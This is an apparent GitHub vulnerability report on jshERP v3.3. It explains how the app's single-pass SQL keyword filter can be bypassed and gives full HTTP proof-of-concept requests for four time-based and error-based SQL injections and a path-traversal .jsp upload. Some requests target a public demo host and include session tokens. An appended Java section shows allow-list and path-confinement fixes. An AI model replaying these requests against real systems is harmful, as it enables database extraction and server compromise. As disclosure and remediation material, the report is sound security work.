
There are 4 sql injection vulnerabilities and 1 file upload vulnerability in jshERP v3.3 #99

Open
cxcxcxcxcxcxcxc opened this issue Jan 12, 2024 · 0 comments

Comments

@cxcxcxcxcxcxcxc

```java
// jshERP's input filter as quoted in this report: a single pass of
// case-insensitive replaceAll over a keyword deny-list. Matched fragments are
// deleted and the result is not rescanned, which is what the bypass below abuses.
public static String safeSqlParse(String originStr){
    return originStr.replaceAll("(?i)" + regex, "");
}

// The deny-list. Each keyword is listed with leading-space, trailing-space and
// bare variants, so a match removes the keyword plus at most one adjacent space.
public final static String regex = "'|#|%|;|--| and | and|and | or | or|or | not | not|not " +
    "| use | use|use | insert | insert|insert | delete | delete|delete | update | update|update " +
    "| select | select|select | count | count|count | group | group|group | union | union|union " +
    "| create | create|create | drop | drop|drop | truncate | truncate|truncate | alter | alter|alter " +
    "| grant | grant|grant | execute | execute|execute | exec | exec|exec | xp_cmdshell | xp_cmdshell|xp_cmdshell " +
    "| call | call|call | declare | declare|declare | source | source|source | sql | sql|sql ";
```

Filtering can be bypassed like this: `a andnd`, `s selectelect`

SQL PoC 1:

```http
GET /jshERP-boot/material/getListWithStock?categoryId=&materialParam=%30%78%36%34%36%35%37%33%36%33%32%37%32%30%36%31%36%65%36%34%32%30%37%33%36%63%36%35%36%35%37%30%32%38%33%35%32%39%32%33&position=%30%78%36%34%36%35%37%33%36%33%32%37%32%30%36%31%36%65%36%34%32%30%37%33%36%63%36%35%36%35%37%30%32%38%33%35%32%39%32%33&zeroStock=0&mpList=111&column=if(1,(s%20selectelect%20sleep(1)),(s%20selectelect%20sleep(1)))&order=asc+limit+%3f,%3f+-'-&field=id,,rowIndex,action,mBarCode,name,standard,model,color,categoryName,position,unitName,purchaseDecimal,initialStock,currentStock,currentStockPrice,currentWeight&currentPage=1&pageSize=10&depotIds=1 HTTP/2
Host: cloud.huaxiaerp.com
Cookie: Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1704888493; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1704958316
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Access-Token: 9a45f201f4594fd7a66aee82d526e155_151076
Referer: https://cloud.huaxiaerp.com/report/material_stock
```

[screenshot]

SQL PoC 2:

```http
GET /jshERP-boot/depotHead/findInOutDetail?organId=&number=&materialParam=xxxxxxxxxxxxxxxxxxxxxxxx&depotId=11111&beginTime=2024-01-01&endTime=2024-01-11&type=%E5%85%A5%E5%BA%93&creator=&organizationId=&remark=&column=%65%78%74%72%61%63%74%76%61%6c%75%65%28%31%2c%75%73%65%72%28%29%29%20%61%73%63%20%6c%69%6d%69%74%20%3f%2c%3f%20%2d%27%2d&order=desc&field=id,,rowIndex,number,barCode,mname,standard,model,mUnit,operNumber,unitPrice,allPrice,taxRate,taxMoney,sname,dname,operTime,newRemark&currentPage=1&pageSize=10 HTTP/1.1
Host: 192.168.120.133:9999
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```

[screenshot]

SQL PoC 3:

```http
GET /jshERP-boot/depotHead/findInOutMaterialCount?organId=&materialParam=&depotId=&organizationId=&beginTime=2024-01-01&endTime=2024-01-12&type=%E5%87%BA%E5%BA%93&column=if(1,(s%20selectelect%20sleep(5)),(s%20selectelect%20sleep(5)))&order=asc+limit+%3f,%3f+-'-&field=id,,rowIndex,barCode,mName,standard,model,categoryName,materialUnit,numSum,priceSum&currentPage=1&pageSize=10 HTTP/2
Host: cloud.huaxiaerp.com
Cookie: Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1704888493; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1704958316
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Access-Token: 9a45f201f4594fd7a66aee82d526e155_151076
Referer: https://cloud.huaxiaerp.com/report/out_material_count
```

[screenshot]

SQL PoC 4:

```http
GET /jshERP-boot/depotHead/findAllocationDetail?organId=&number=&materialParam=&depotId=&depotIdF=&organizationId=&beginTime=2024-01-01&endTime=2024-01-12&subType=%E8%B0%83%E6%8B%A8&remark=&column=if(1,(s%20selectelect%20sleep(1)),(s%20selectelect%20sleep(1)))&order=asc+limit+%3f,%3f+-'-&field=id,,rowIndex,number,barCode,mname,standard,model,mUnit,operNumber,unitPrice,allPrice,dname,sname,operTime,newRemark&currentPage=1&pageSize=10 HTTP/2
Host: cloud.huaxiaerp.com
Cookie: Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1704888493; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1704958316
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Access-Token: 9a45f201f4594fd7a66aee82d526e155_151076
Referer: https://cloud.huaxiaerp.com/report/allocation_detail
```

[screenshot]

File upload PoC:

No strong checksum for filenames; the `biz` parameter can be spliced into paths.

```http
POST /jshERP-boot/systemConfig/upload?biz=../../../home/jshERP/jshERP-web/js HTTP/2
Host: cloud.huaxiaerp.com
Cookie: Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1704888493; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1704888854
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Access-Token: d22cf07e24434e33a82e43a85be5b0bb_151076
Content-Type: multipart/form-data; boundary=---------------------------18460234522258
Content-Length: 202
Upgrade-Insecure-Requests: 1

-----------------------------18460234522258
Content-Disposition: form-data; name="file"; filename="test.jsp"
Content-Type: text/plain

this is a test
-----------------------------18460234522258--
```

[screenshot]
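The two weaknesses in this report share a root cause: user input is sanitised by deletion instead of being validated against what the endpoint actually accepts. The following is an added example, not jshERP's code and not part of the issue above. It keeps an abbreviated copy of the report's deny-list only to show why a single-pass `replaceAll` cannot be patched into a fix, then shows the hardened alternatives for both findings: an allow-list for the `column`/`order` parameters that feed `ORDER BY`, and a `biz` check plus root-confinement for the upload path. The column names, the upload root directory and the allowed extensions are hypothetical values chosen for the example.

```java
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Locale;
import java.util.Set;
import java.util.UUID;
import java.util.regex.Pattern;

// Added illustration only: hypothetical hardened checks, not jshERP's own code.
public final class RequestValidation {

    // Abbreviated copy of the report's deny-list, kept to show why a single-pass
    // strip is not a fix: deleting one " select" from "s selectelect" leaves a
    // fresh "select" behind, and replaceAll never rescans the rewritten string.
    static final String WEAK_REGEX = "'|#|%|;|--| and | and|and | or | or|or "
            + "| select | select|select | union | union|union ";

    static String weakSafeSqlParse(String originStr) {
        return originStr.replaceAll("(?i)" + WEAK_REGEX, "");
    }

    // Hardened ORDER BY handling: column and direction are looked up in fixed
    // allow-lists (hypothetical names for this example). Anything else is
    // rejected; nothing taken from the request is ever rewritten into SQL.
    private static final Set<String> SORTABLE_COLUMNS = Set.of(
            "id", "name", "standard", "model", "categoryName", "position", "unitName", "currentStock");
    private static final Set<String> DIRECTIONS = Set.of("asc", "desc");

    static String orderByClause(String column, String order) {
        if (column == null || !SORTABLE_COLUMNS.contains(column)) {
            throw new IllegalArgumentException("column is not sortable");
        }
        String dir = order == null ? "asc" : order.toLowerCase(Locale.ROOT);
        if (!DIRECTIONS.contains(dir)) {
            throw new IllegalArgumentException("order must be asc or desc");
        }
        // Offset and page size stay bound parameters ("LIMIT ?,?") in the mapper.
        return "ORDER BY `" + column + "` " + dir.toUpperCase(Locale.ROOT);
    }

    // Hardened upload path: biz must match a tight pattern, the client filename
    // is never reused (only its extension, checked against an allow-list), and
    // the final path is normalized and confined to the upload root
    // (a hypothetical directory for this example).
    private static final Path UPLOAD_ROOT = Paths.get("/srv/jsherp-upload").toAbsolutePath().normalize();
    private static final Pattern BIZ = Pattern.compile("[A-Za-z0-9_-]{1,32}");
    private static final Set<String> ALLOWED_EXT = Set.of("png", "jpg", "jpeg", "gif", "pdf");

    static Path resolveUploadTarget(String biz, String clientFilename) {
        if (biz == null || !BIZ.matcher(biz).matches()) {
            throw new IllegalArgumentException("invalid biz");
        }
        String ext = extensionOf(clientFilename);
        if (!ALLOWED_EXT.contains(ext)) {
            throw new IllegalArgumentException("file type not allowed");
        }
        String storedName = UUID.randomUUID() + "." + ext;
        Path target = UPLOAD_ROOT.resolve(biz).resolve(storedName).normalize();
        if (!target.startsWith(UPLOAD_ROOT)) {
            throw new IllegalArgumentException("path escapes upload root");
        }
        return target;
    }

    private static String extensionOf(String filename) {
        if (filename == null) {
            return "";
        }
        int dot = filename.lastIndexOf('.');
        return dot < 0 ? "" : filename.substring(dot + 1).toLowerCase(Locale.ROOT);
    }

    public static void main(String[] args) {
        // The report's bypass strings come out of the weak filter as live keywords.
        System.out.println(weakSafeSqlParse("s selectelect"));
        System.out.println(weakSafeSqlParse("a andnd"));
        // The allow-list accepts a real column and rejects everything else.
        System.out.println(orderByClause("name", "asc"));
        for (String bad : new String[] {"if(1,(select sleep(1)),1)", "s selectelect"}) {
            try {
                orderByClause(bad, "asc");
            } catch (IllegalArgumentException e) {
                System.out.println("rejected column: " + e.getMessage());
            }
        }
        // A traversal value for biz, as in the report, never reaches the filesystem.
        System.out.println(resolveUploadTarget("material", "photo.png"));
        try {
            resolveUploadTarget("../../../home/jshERP/jshERP-web/js", "test.jsp");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected upload: " + e.getMessage());
        }
    }
}
```

Run with `java RequestValidation.java` (Java 11+). The weak filter collapses `s selectelect` to `select` and `a andnd` to `and`, which is exactly the bypass the report describes; the allow-list version never sees a keyword to strip because a value that is not a known column name is refused before any SQL is built. For the upload, the `biz` pattern alone stops the `../` value in the PoC, and the `startsWith(UPLOAD_ROOT)` check after `normalize()` is the second line of defence should a future caller build the path from another source.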
